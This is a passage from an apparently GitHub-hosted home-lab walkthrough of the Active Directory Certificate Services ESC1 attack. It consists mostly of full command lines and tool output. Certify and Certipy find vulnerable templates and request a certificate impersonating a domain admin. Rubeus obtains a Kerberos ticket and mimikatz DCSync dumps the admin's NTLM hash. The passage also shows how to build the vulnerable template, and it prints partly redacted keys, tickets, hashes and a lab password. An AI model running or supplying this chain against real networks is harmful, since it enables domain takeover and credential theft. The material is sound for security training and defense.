ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ certipy auth -pfx svc_admin.pfx -dc-ip 192.168.68.230 404 | Certipy v4.8.2 - by Oliver Lyak (ly4k) 405 | 406 | [*] Using principal: svc_admin@hacklab.local 407 | [*] Trying to get TGT... 408 | [*] Got TGT 409 | [*] Saved credential cache to 'svc_admin.ccache' 410 | [*] Trying to retrieve NT hash for 'svc_admin' 411 | [*] Got hash for 'svc_admin@hacklab.local': aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 412 | ``` 413 | 414 | **Using Certify** 415 | 416 | Finding Vulnerable certs 417 | 418 | ``` 419 | C:\Users\g.white\Desktop\Tools>Certify.exe find /vulnerable 420 | 421 | _____ _ _ __ 422 | / ____| | | (_)/ _| 423 | | | ___ _ __| |_ _| |_ _ _ 424 | | | / _ \ '__| __| | _| | | | 425 | | |___| __/ | | |_| | | | |_| | 426 | \_____\___|_| \__|_|_| \__, | 427 | __/ | 428 | |___./ 429 | v1.1.0 430 | 431 | [*] Action: Find certificate templates 432 | [*] Using the search base 'CN=Configuration,DC=hacklab,DC=local' 433 | 434 | [*] Listing info about the Enterprise CA 'hacklab-WIN-8HPLF8PSHC1-CA' 435 | 436 | Enterprise CA Name : hacklab-WIN-8HPLF8PSHC1-CA 437 | DNS Hostname : WIN-8HPLF8PSHC1.hacklab.local 438 | FullName : WIN-8HPLF8PSHC1.hacklab.local\hacklab-WIN-8HPLF8PSHC1-CA 439 | Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED 440 | Cert SubjectName : CN=hacklab-WIN-8HPLF8PSHC1-CA, DC=hacklab, DC=local 441 | Cert Thumbprint : 51A0D5E415EF8F50F5B4CA8CEC632B3D5A85F9E7 442 | Cert Serial : 354DB064F33080BD4EB9FEAABE87DCF1 443 | Cert Start Date : 23/04/2024 14:56:37 444 | Cert End Date : 23/04/2029 15:06:33 445 | Cert Chain : CN=hacklab-WIN-8HPLF8PSHC1-CA,DC=hacklab,DC=local 446 | UserSpecifiedSAN : Disabled 447 | CA Permissions : 448 | Owner: BUILTIN\Administrators S-1-5-32-544 449 | 450 | Access Rights Principal 451 | 452 | Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11 453 | Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544 454 | Allow ManageCA, ManageCertificates HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512 455 | Allow ManageCA, ManageCertificates HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519 456 | Enrollment Agent Restrictions : None 457 | 458 | [!] Vulnerable certificate templates that exist but an Enterprise CA does not publish: 459 | 460 | ESC3-Vuln2 461 | 462 | 463 | [!] Vulnerable Certificates Templates : 464 | 465 | CA Name : WIN-8HPLF8PSHC1.hacklab.local\hacklab-WIN-8HPLF8PSHC1-CA 466 | Template Name : ESC1-Vun1 467 | Schema Version : 2 468 | Validity Period : 1 year 469 | Renewal Period : 6 weeks 470 | msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT 471 | mspki-enrollment-flag : PUBLISH_TO_DS 472 | Authorized Signatures Required : 0 473 | pkiextendedkeyusage : Client Authentication, Server Authentication 474 | mspki-certificate-application-policy : Client Authentication, Server Authentication 475 | Permissions 476 | Enrollment Permissions 477 | Enrollment Rights : HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512 478 | HACKLAB\Domain Computers S-1-5-21-2199964591-1196550447-1073987862-515 479 | HACKLAB\Domain Users S-1-5-21-2199964591-1196550447-1073987862-513 480 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519 481 | NT AUTHORITY\Authenticated UsersS-1-5-11 482 | Object Control Permissions 483 | Owner : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500 484 | WriteOwner Principals : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500 485 | HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512 486 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519 487 | WriteDacl Principals : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500 488 | HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512 489 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519 490 | WriteProperty Principals : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500 491 | HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512 492 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519 493 | 494 | CA Name : WIN-8HPLF8PSHC1.hacklab.local\hacklab-WIN-8HPLF8PSHC1-CA 495 | Template Name : Vuln_Cert 496 | Schema Version : 2 497 | Validity Period : 1 year 498 | Renewal Period : 6 weeks 499 | msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT 500 | mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS 501 | Authorized Signatures Required : 0 502 | pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email 503 | mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email 504 | Permissions 505 | Enrollment Permissions 506 | Enrollment Rights : HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512 507 | HACKLAB\Domain Users S-1-5-21-2199964591-1196550447-1073987862-513 508 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519 509 | NT AUTHORITY\Authenticated UsersS-1-5-11 510 | Object Control Permissions 511 | Owner : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500 512 | WriteOwner Principals : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500 513 | HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512 514 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519 515 | WriteDacl Principals : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500 516 | HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512 517 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519 518 | WriteProperty Principals : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500 519 | HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512 520 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519 521 | 522 | 523 | 524 | Certify completed in 00:00:01.2930508 525 | ``` 526 | 527 | **The following details the sections that make a certificate vulnerable to ESC1, please seek the sections with the ** for more info.** 528 | 529 | ``` 530 | CA Name : WIN-8HPLF8PSHC1.hacklab.local\hacklab-WIN-8HPLF8PSHC1-CA 531 | Template Name : ESC1-Vun1 - **You need this** 532 | Schema Version : 2 533 | Validity Period : 1 year 534 | Renewal Period : 6 weeks 535 | msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT - **To be vuln it has to say ENROLLEE_SUPPLIES_SUBJECT** 536 | mspki-enrollment-flag : PUBLISH_TO_DS 537 | Authorized Signatures Required : 0 538 | pkiextendedkeyusage : Client Authentication, Server Authentication - **To be vuln it has to include Client Authentication** 539 | mspki-certificate-application-policy : Client Authentication, Server Authentication 540 | Permissions 541 | Enrollment Permissions 542 | Enrollment Rights : HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512 543 | HACKLAB\Domain Computers S-1-5-21-2199964591-1196550447-1073987862-515 544 | HACKLAB\Domain Users S-1-5-21-2199964591-1196550447-1073987862-513 545 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519 546 | NT AUTHORITY\Authenticated UsersS-1-5-11 - **To be vuln it has to include Authenticated UsersS-1-5-11** 547 | Object Control Permissions 548 | Owner : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500 549 | WriteOwner Principals : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500 550 | HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512 551 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519 552 | WriteDacl Principals : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500 553 | HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512 554 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519 555 | WriteProperty Principals : HACKLAB\Administrator S-1-5-21-2199964591-1196550447-1073987862-500 556 | HACKLAB\Domain Admins S-1-5-21-2199964591-1196550447-1073987862-512 557 | HACKLAB\Enterprise Admins S-1-5-21-2199964591-1196550447-1073987862-519 558 | ``` 559 | 560 | Exploiting the certificate and requesting a certificate associated with the account that belongs to the domain admins group. 561 | 562 | ``` 563 | C:\Users\g.white\Desktop\Tools>certify.exe request /ca:WIN-8HPLF8PSHC1.hacklab.local\hacklab-WIN-8HPLF8PSHC1-CA /template:ESC1-Vun1 /altname:da1 564 | 565 | _____ _ _ __ 566 | / ____| | | (_)/ _| 567 | | | ___ _ __| |_ _| |_ _ _ 568 | | | / _ \ '__| __| | _| | | | 569 | | |___| __/ | | |_| | | | |_| | 570 | \_____\___|_| \__|_|_| \__, | 571 | __/ | 572 | |___./ 573 | v1.1.0 574 | 575 | [*] Action: Request a Certificates 576 | 577 | [*] Current user context : HACKLAB\g.white 578 | [*] No subject name specified, using current context as subject. 579 | 580 | [*] Template : ESC1-Vun1 581 | [*] Subject : CN=g.white, OU=Administration, OU=Head_Office, OU=Departments, DC=hacklab, DC=local 582 | [*] AltName : da1 583 | 584 | [*] Certificate Authority : WIN-8HPLF8PSHC1.hacklab.local\hacklab-WIN-8HPLF8PSHC1-CA 585 | 586 | [*] CA Response : The certificate had been issued. 587 | [*] Request ID : 15 588 | 589 | [*] cert.pem : 590 | 591 | -----BEGIN RSA PRIVATE KEY----- 592 | MIIEpAIBAAKCAQEAsNLW/YHm5zlhkQe0oGGEvHge3RYqtmChX7R6OpWWQc8fevLs 593 | Q18laqoZferjm5GPwADobns8Ll1zcE01fy+ifLVR3LGJV67usQcdRVMZmNcgxs9n 594 | YtWL11EzPMF1I9tGx0kbIPfw1Y+EmMTeb7Jr7PfcLtzm0o29FriLtKrqkTaQB4+R 595 | Ab2wS1mIQJ34H+zRGALkw1zHi1SXjgxQV/XQraudgIOEtOhL83TMGVpmLSyPWN3Q 596 | 97ptHY41hg8SuakASciZmImvqLd5jieafgPYLfmWF+WYuq5PPyGRg0XqVQ9MXG6a 597 | zatLC4grP-Redacted-Ia0aSwBxGM975oj/WOXO8I5N64o+yH6 598 | 8MeRU6RdNQdbJ79n0v75aqSV/oHeneEBN5t3/A+kntiXEi05LqWrXE7QyPkLZfvB 599 | CHMYqK2D1R+lcFu8FPzkTXPxfgqTJUJqSJ3+zBDw7nH4RlilMEaWY10GxyoLj8O2 600 | xOu6GF+RAoGBAN61sAk26pjaSr80EIm8Vf1RMWGFu7/uIWHZ9x4de2xEfjMSid72 601 | oaJFp7e7p9XdAcFFseF2Myt2WK5hB0xv6QcCHIYVX0ODRELe3RHm/TZOLVeqxZO0 602 | nGIoZw93QvGNM/Ku1R+J7sxQSwucy853Btz++fIrDmgUfyzgEmxLX2vTAoGBAMtB 603 | QK2qYbjIW5pMtQLTxQ3fTuPzcTViYHScbE0FfWCxzyiZK12uRH7A97nHhdtyw+s4 604 | ous4z012U3aVv4-Redacted-pDlRjOJiNVdcAVdDFq58r 605 | ShxKaEzeUxK4nHhDoqdXLtcAxHEi8ZasjLgAv5/DkpGxmwSxoMPGZJKj4UoKZZGt 606 | NiEugT4VjFQn+/qITM2NC+CLAoGAaCwQbzG1FhSyRjnsR/+rrjl2YIRj0F2UXA/T 607 | vgIDSWy4ZPFj9Yacmm5iSPhG1btTSJplfbNHJEdx7YRAe1ISEMmmrTDsMCqkMRNX 608 | 5oUlL+lNcF7Goj4qS6sA0WU1KxblpGu4zggpeLTvQ9yVXv4M8oWOBKFIPmKv9qm6 609 | ZO2IOy8CgYAeF18wJSkfYmqk4hYhopzWQP5v0gOvENAe1v8hsT8LtYMPUCRGpcoC 610 | mKHvi46BRdYBpOI6uh30xuvbahy19v6O+8R966X7piFnFpzUQi0GHUe9OBCQZiWo 611 | D5ktQd28gl0x6AnnPt9p1ZXSEbMI8afxcQHZn7kdfxWOnC/1OTiN6A== 612 | -----END RSA PRIVATE KEY----- 613 | -----BEGIN CERTIFICATE----- 614 | MIIGHjCCBQagAwIBAgITHAAAAA/TpYI1etGPcAAAAAAADzANBgkqhkiG9w0BAQsF 615 | ADBVMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxFzAVBgoJkiaJk/IsZAEZFgdoYWNr 616 | bGFiMSMwIQYDVQQDExpoYWNrbGFiLVdJTi04SFBMRjhQU0hDMS1DQTAeFw0yNDA3 617 | MTUxMTI1MTZaFw0yNTA3MTUxMTI1MTZaMIGHMRUwEwYKCZImiZPyLGQBGRYFbG9j 618 | YWwxFzAVBgoJkiaJk/IsZAEZFgdoYWNrbGFiMRQwEgYDVQQLEwtEZXBhcnRtZW50 619 | czEUMBIGA1UECwwLSGVhZF9PZmZpY2UxFzAVBgNVBAsTDkFkbWluaXN0cmF0aW9u 620 | MRAwDgYDVQQDEwdnLndoaXRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC 621 | AQEAsNLW/YHm5zlhkQe0oGGEvHge3RYqtmChX7R6OpWWQc8fevLsQ18laqoZferj 622 | m5GPwADobns8Ll1zcE01fy+ifLVR3LGJV67usQcdRVMZmNcgxs9nYtWL11EzPMF1 623 | I9tGx0kbIPfw1Y-Redacted-PEdIevkzuBaITl5VaD9cE4AgFkAgEI 624 | MB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAOBgNVHQ8BAf8EBAMCBaAw 625 | JwYJKwYBBAGCNxUKBBowGDAKBggrBgEFBQcDATAKBggrBgEFBQcDAjAdBgNVHQ4E 626 | FgQUeMBVjiux6/Z28M2g+1iGdQstLOEwHgYDVR0RBBcwFaATBgorBgEEAYI3FAID 627 | oAUMA2RhMTAfBgNVHSMEGDAWgBSAEotT6qXYz/osdwaI1ufK7UYqHDCB4gYDVR0f 628 | BIHaMIHXMIHUoIHRoIHOhoHLbGRhcDovLy9DTj1oYWNrbGFiLVdJTi04SFBMRjhQ 629 | U0hDMS1DQSxDTj1XSU4tOEhQTEY4UFNIQzEsQ049Q0RQLENOPVB1YmxpYyUyMEtl 630 | eSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9aGFj 631 | a2xhYixEQz1sb2NhbD9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2Jq 632 | ZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgc4GCCsGAQUFBwEBBIHBMIG+ 633 | MIG7BggrBgEFBQcwAoaBrmxkYXA6Ly8vQ049aGFja2xhYi1XSU4tOEhQTEY4UFNI 634 | QzEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZp 635 | Y2VzLENOPUNvbmZpZ3VyYXRpb24sREM9aGFja2xhYixEQz1sb2NhbD9jQUNlcnRp 636 | ZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTAN 637 | BgkqhkiG9w0BAQsFAAOCAQEAgrGix8g/O+/lrkDJPslz+LBFfA4I8g5vsue3zYqL 638 | 7xA0pTibfgnYfP32UfR+dSMJEBE8uo0hA2Wl+Lo0E5O4Xzmsu/7blgc3nf5FsyDP 639 | Tr3Wyg9cpkXkVDb4cTOHQ3kKvKPfEQjnXRpMxKk1Wy5MHxmgezH5tbAQHdBdrLMt 640 | F4oXLfvFF5dRikkbdZoFK/EXl8jKcrDYkIH3EssXUN1MqrB6vdi5EjNw+zslcKoo 641 | HzBxq/0vAb6vp5WpKB7fnCDTwJK0zMgGFtYdHRk+BDX6bmMYwYLLFSbFlkbxyxpI 642 | C3BkT38Cq+TP9uEcy1WbqCWgMO9gSzp3TVzwFzwXPT4LYw== 643 | -----END CERTIFICATE----- 644 | 645 | 646 | [*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx 647 | 648 | 649 | 650 | Certify completed in 00:00:04.7931478 651 | ``` 652 | 653 | **Copy from -----BEGIN RSA PRIVATE KEY----- ... -----END CERTIFICATE----- section to a file on Linux/macOS open nano and save the contents as cert.pem, and run the openssl command to convert it to a .pfx. When prompted, don't enter a password:** 654 | 655 | ``` 656 | ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx 657 | Enter Export Password: 658 | Verifying - Enter Export Password: 659 | ``` 660 | 661 | **Finally, move the cert.pfx to your target machine filesystem (manually or through Cobalt Strike), and request a TGT for the altname user using Rubeus:** 662 | 663 | ``` 664 | C:\Users\g.white\Desktop\Tools>Rubeus.exe asktgt /user:da1 /certificate:C:\Users\g.white\Desktop\Tools\Cert\cert.pfx 665 | 666 | ______ _ 667 | (_____ \ | | 668 | _____) )_ _| |__ _____ _ _ ___ 669 | | __ /| | | | _ \| ___ | | | |/___) 670 | | | \ \| |_| | |_) ) ____| |_| |___ | 671 | |_| |_|____/|____/|_____)____/(___/ 672 | 673 | v2.0.1 674 | 675 | [*] Action: Ask TGT 676 | 677 | [*] Using PKINIT with etype rc4_hmac and subject: CN=g.white, OU=Administration, OU=Head_Office, OU=Departments, DC=hacklab, DC=local 678 | [*] Building AS-REQ (w/ PKINIT preauth) for: 'hacklab.local\da1' 679 | [+] TGT request successful! 680 | [*] base64(ticket.kirbi): 681 | 682 | doIGDjCCBgqgAwIBBaEDAgEWooIFJTCCBSFhggUdMIIFGaADAgEFoQ8bDUhBQ0tMQUIuTE9DQUyiIjAg 683 | oAMCAQKhGTAXGwZrcmJ0Z3QbDWhhY2tsYWIubG9jYWyjggTbMIIE16ADAgESoQMCAQOiggTJBIIExbtJ 684 | /CkJ3ysfomHsKTwE/slEePtK76iHyi+mo8vYSfVu64lXcVFLGnRrpGnmbVYbCzTWGE+BmDHd2oiMdbO/ 685 | e78+1Z6zgBsRxyPvDb/YthECsuZSMaLdloXUW+vSxxj2BUQtqJqnDlJ9OehTh0p37TvZVFMzdZrc9v7S 686 | uRSIQJM0RcKvLJqI+hQQYZPLruqGgKVXYru10DduizHARuqrdbzFUFNHcV3HrT4gYGUbyj+flXYkWo1l 687 | 4AQs4E+wTrXxv6PncX5EJmGf1TpE7B4ZW9SGSaydZqLt1tq5SPKjTh2i5JWCcl4H/1C0yRPL05XRY9Nh 688 | oRJy2Dkx7pLt+yZVpfrGcM5t5G7E2N6rgItVlKnhyTkRpf+nzvPwujISv7TfigY6p8VMUyhfTGOEncZK 689 | HMxUxNUWvMhrq4I4jEno6Ql2RZpOrcZ826D3AGT8cAPzEGw/UH3+ZpA4Fyqcz3O0Wot97eBWT66XPQRI 690 | fPfpjGcu7ROT37fHIPLLGpBsVPz1Q3m8137M/q/RD/Fwni//cxIH8BwGms76eYIIjLhopyEMeTbD6j1y 691 | ulWw8hbeSzGpc70ReOEYO5Xhu4CsCE0xNo6VuSsDPoIDLTGMcU3dL5pgOA+lwACYRtb5qUAM8Ymib6O4 692 | nwDt8tRD0wkBEJKQt2hSLQz-Redacted-ZfsnkwH4q1PGA2KowtK07Os5gbkxKo 693 | VgELxPWxj7pqr8JpZVDWT7w+mj8/v4eoj6UKt2qpiySCyg6SWCz1M0YRGd7nWmLVzyvMVogUtv1a00kE 694 | dOJnjv19Q7l7+O74Pd0rX/EMH3/yfk5yNUpXvU4FiFe4MxOJjpZweknCa/OvossyhDvWpaHqD+Ag7A6U 695 | 2eFvNyZjqEsLa8whe5fWh5ekFkCiaf0lNqjSm5gHBw4yXqxnECBid9RuvxaWJcPBEkzg0DCkx927PfI0 696 | RbLKlp7FtrBY5AjQYGKUXiV4j6sr7cWaN5WjvwAv6mxQ6FRzJaD6j6G1WZx8eUCr3kW+GTht5YLkzEqW 697 | WE6MutLZZ8i5UQrB8AXcI6dDrbWd3Pez8MbGy2CPJOiGLkwRsOpDcIBKi2npHbRTy+IRFSdB1RXKmwWF 698 | umxGF0B708p9klh8GruWnjBENgtavrSogbHuwVrLaBPYVfBcgG4CQRupBgQlAb3/5wFIQBScuDpel0hr 699 | zUJZRYzjpLk8iX/j4MR4RwNf4aOB1DCB0aADAgEAooHJBIHGfYHDMIHAoIG9MIG6MIG3oBswGaADAgEX 700 | oRIEEFIaGS8R6f/MBX769dkk7fahDxsNSEFDS0xBQi5MT0NBTKIQMA6gAwIBAaEHMAUbA2RhMaMHAwUA 701 | QOEAAKURGA8yMDI0MDcxNTEyMjUwNVqmERgPMjAyNDA3MTUyMjI1MDVapxEYDzIwMjQwNzIyMTIyNTA1 702 | WqgPGw1IQUNLTEFCLkxPQ0FMqSIwIKADAgECoRkwFxsGa3JidGd0Gw1oYWNrbGFiLmxvY2Fs 703 | 704 | ServiceName : krbtgt/hacklab.local 705 | ServiceRealm : HACKLAB.LOCAL 706 | UserName : da1 707 | UserRealm : HACKLAB.LOCAL 708 | StartTime : 15/07/2024 13:25:05 709 | EndTime : 15/07/2024 23:25:05 710 | RenewTill : 22/07/2024 13:25:05 711 | Flags : name_canonicalize, pre_authent, initial, renewable, forwardable 712 | KeyType : rc4_hmac 713 | Base64(key) : UhoZLx-Redacted-r12STt9g== 714 | ASREP (key) : 902A410-Redacted-F7F5D96D 715 | 716 | 717 | C:\Users\g.white\Desktop\Tools> 718 | ``` 719 | 720 | **You can then use mimikatz to dump the NTLM hash, you do not need to execute mimikatz with admin privileges.** 721 | 722 | ``` 723 | mimikatz # lsadump::dcsync /dc:WIN-8HPLF8PSHC1.hacklab.local /domain:hacklab.local /user:da1 724 | [DC] 'hacklab.local' will be the domain 725 | [DC] 'WIN-8HPLF8PSHC1.hacklab.local' will be the DC server 726 | [DC] 'da1' will be the user account 727 | [rpc] Service : ldap 728 | [rpc] AuthnSvc : GSS_NEGOTIATE (9) 729 | 730 | Object RDN : da1 731 | 732 | ** SAM ACCOUNT ** 733 | 734 | SAM Username : da1 735 | User Principal Name : da1@hacklab.local 736 | Account Type : 30000000 ( USER_OBJECT ) 737 | User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD ) 738 | Account expiration : 739 | Password last change : 15/04/2024 12:37:12 740 | Object Security ID : S-1-5-21-2199964591-1196550447-1073987862-1103 741 | Object Relative ID : 1103 742 | 743 | Credentials: 744 | Hash NTLM: fc525c9683e8fe067095ba2ddc971889 745 | ntlm- 0: fc525c9683e8fe067095ba2ddc971889 746 | lm - 0: 1037af637604d47c1309c0d208172545 747 | ``` 748 | 749 | 750 | **Certify errors** 751 | 752 | The below error was caused because I executed the certify.exe file without also moving the Interop.CERTENROLLLib.dll file. Add the Interop.CERTENROLLLib.dll file to the same directory and the problem is fixed. 753 | 754 | ``` 755 | C:\Users\g.white\Desktop\Tools>certify.exe request /ca:WIN-8HPLF8PSHC1.hacklab.local\hacklab-WIN-8HPLF8PSHC1-CA /template:ESC1-Vun1 /altname:da1 756 | 757 | _____ _ _ __ 758 | / ____| | | (_)/ _| 759 | | | ___ _ __| |_ _| |_ _ _ 760 | | | / _ \ '__| __| | _| | | | 761 | | |___| __/ | | |_| | | | |_| | 762 | \_____\___|_| \__|_|_| \__, | 763 | __/ | 764 | |___./ 765 | v1.1.0 766 | 767 | [*] Action: Request a Certificates 768 | 769 | [!] Unhandled Certify exception: 770 | 771 | System.IO.FileNotFoundException: Could not load file or assembly 'Interop.CERTENROLLLib, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. The system cannot find the file specified. 772 | File name: 'Interop.CERTENROLLLib, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null' 773 | at Certify.Cert.RequestCert(String CA, Boolean machineContext, String templateName, String subject, String altName, String sidExtension, Boolean install) 774 | at Certify.Commands.Request.Execute(Dictionary`2 arguments) 775 | at Certify.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments) 776 | at Certify.Program.MainExecute(String commandName, Dictionary`2 parsedArgs) 777 | ``` 778 | 779 | 780 | 781 | 782 | **Creating Vulnerable ESC1 Certificate** 783 | 784 | 785 | 1. Open Server Manager / Tools / Certification Authority. 786 | 787 | ![1](https://github.com/myexploit/LAB/assets/15686493/a62c3e4f-8522-4c34-9d67-c74291dc1b32) 788 | 789 | 790 | 2. Right click on Certificate Templates / Manage. 791 | 792 | ![2](https://github.com/myexploit/LAB/assets/15686493/50df8455-e8a0-4586-9ac4-0abecefe906f) 793 | 794 | 795 | 3. Pull down to User right click select Duplicate Template. 796 | 797 | ![3](https://github.com/myexploit/LAB/assets/15686493/563f34d8-a250-474f-ac55-9cde9f2d284c) 798 | 799 | 800 | 4. Click on the General tab and rename the certificate. 801 | 802 | ![4](https://github.com/myexploit/LAB/assets/15686493/d1c4fb5b-4a03-4223-8453-83226a87ae50) 803 | 804 | 5. Click on the Security tab and for Authenticated Users, tick Enroll. 805 | 806 | ![5](https://github.com/myexploit/LAB/assets/15686493/8d4dfdf4-b496-4d60-923e-b3ee85aedace) 807 | 808 | 6. Click on the Subject Name and select Supply in the request. 809 | 810 | ![6](https://github.com/myexploit/LAB/assets/15686493/cbd3078b-4e1a-49da-ac8d-a52000337240) 811 | 812 | 7. Apply then click OK. 813 | 814 | 8. Click back to Certification Authority / Certificate Templates and right click then select Certificate Template to Issue. 815 | 816 | ![8](https://github.com/myexploit/LAB/assets/15686493/41726a53-a2e8-440e-9d49-dcbfda625057) 817 | 818 | 9. Select your created certificate and then click OK. 819 | 820 | ![9](https://github.com/myexploit/LAB/assets/15686493/6a02fc9c-a619-4e7c-ae88-0cd93bda780a) 821 | 822 | 10. You should then see your active certificate. 823 | 824 | ![10](https://github.com/myexploit/LAB/assets/15686493/2ddd7d05-874d-4f66-b979-60f668c7a462) 825 | 826 | 827 | The following has been included to demonstrate that the certificate was then vulnerable. 828 | 829 | ``` 830 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ certipy find -u g.white -p "Passw0rd!" -dc-ip 192.168.68.230 -scheme ldaps -ldap-channel-binding 831 | Certipy v4.8.2 - by Oliver Lyak (ly4k) 832 | 833 | [*] Finding certificate templates 834 | [*] Found 36 certificate templates 835 | [*] Finding certificate authorities 836 | [*] Found 1 certificate authority 837 | [*] Found 14 enabled certificate templates 838 | [*] Trying to get CA configuration for 'hacklab-WIN-8HPLF8PSHC1-CA' via CSRA 839 | [!] Got error while trying to get CA configuration for 'hacklab-WIN-8HPLF8PSHC1-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error. 840 | [*] Trying to get CA configuration for 'hacklab-WIN-8HPLF8PSHC1-CA' via RRP 841 | [!] Failed to connect to remote registry. Service should be starting now. Trying again... 842 | [*] Got CA configuration for 'hacklab-WIN-8HPLF8PSHC1-CA' 843 | [*] Saved BloodHound data to '20240702112224_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k 844 | [*] Saved text output to '20240702112224_Certipy.txt' 845 | [*] Saved JSON output to '20240702112224_Certipy.json' 846 | 847 | 848 | (Tools) ubuntu@ubuntu-virtual-machine:~/Documents/Tools$ gedit 20240702112224_Certipy.txt 849 | 850 | 851 | Certificate Authorities 852 | 0 853 | CA Name : hacklab-WIN-8HPLF8PSHC1-CA 854 | DNS Name : WIN-8HPLF8PSHC1.hacklab.local 855 | Certificate Subject : CN=hacklab-WIN-8HPLF8PSHC1-CA, DC=hacklab, DC=local 856 | Certificate Serial Number : 354DB064F33080BD4EB9FEAABE87DCF1 857 | Certificate Validity Start : 2024-04-23 13:56:37+00:00 858 | Certificate Validity End : 2029-04-23 14:06:33+00:00 859 | Web Enrollment : Disabled 860 | User Specified SAN : Disabled 861 | Request Disposition : Issue 862 | Enforce Encryption for Requests : Enabled 863 | Permissions 864 | Owner : HACKLAB.LOCAL\Administrators 865 | Access Rights 866 | ManageCertificates : HACKLAB.LOCAL\Administrators 867 | HACKLAB.LOCAL\Domain Admins 868 | HACKLAB.LOCAL\Enterprise Admins 869 | ManageCa : HACKLAB.LOCAL\Administrators 870 | HACKLAB.LOCAL\Domain Admins 871 | HACKLAB.LOCAL\Enterprise Admins 872 | Enroll : HACKLAB.LOCAL\Authenticated Users 873 | Certificate Templates 874 | 0 875 | Template Name : Vuln_Cert 876 | Display Name : Vuln_Cert 877 | Certificate Authorities : hacklab-WIN-8HPLF8PSHC1-CA 878 | Enabled : True 879 | Client Authentication : True 880 | Enrollment Agent : False 881 | Any Purpose : False 882 | Enrollee Supplies Subject : True 883 | Certificate Name Flag : EnrolleeSuppliesSubject 884 | Enrollment Flag : PublishToDs 885 | IncludeSymmetricAlgorithms 886 | Private Key Flag : 16777216 887 | 65536 888 | ExportableKey 889 | Extended Key Usage : Client Authentication 890 | Secure Email 891 | Encrypting File System 892 | Requires Manager Approval : False 893 | Requires Key Archival : False 894 | Authorized Signatures Required : 0 895 | Validity Period : 1 year 896 | Renewal Period : 6 weeks 897 | Minimum RSA Key Length : 2048 898 | Permissions 899 | Enrollment Permissions 900 | Enrollment Rights : HACKLAB.LOCAL\Domain Admins 901 | HACKLAB.LOCAL\Domain Users 902 | HACKLAB.LOCAL\Enterprise Admins 903 | HACKLAB.LOCAL\Authenticated Users 904 | Object Control Permissions 905 | 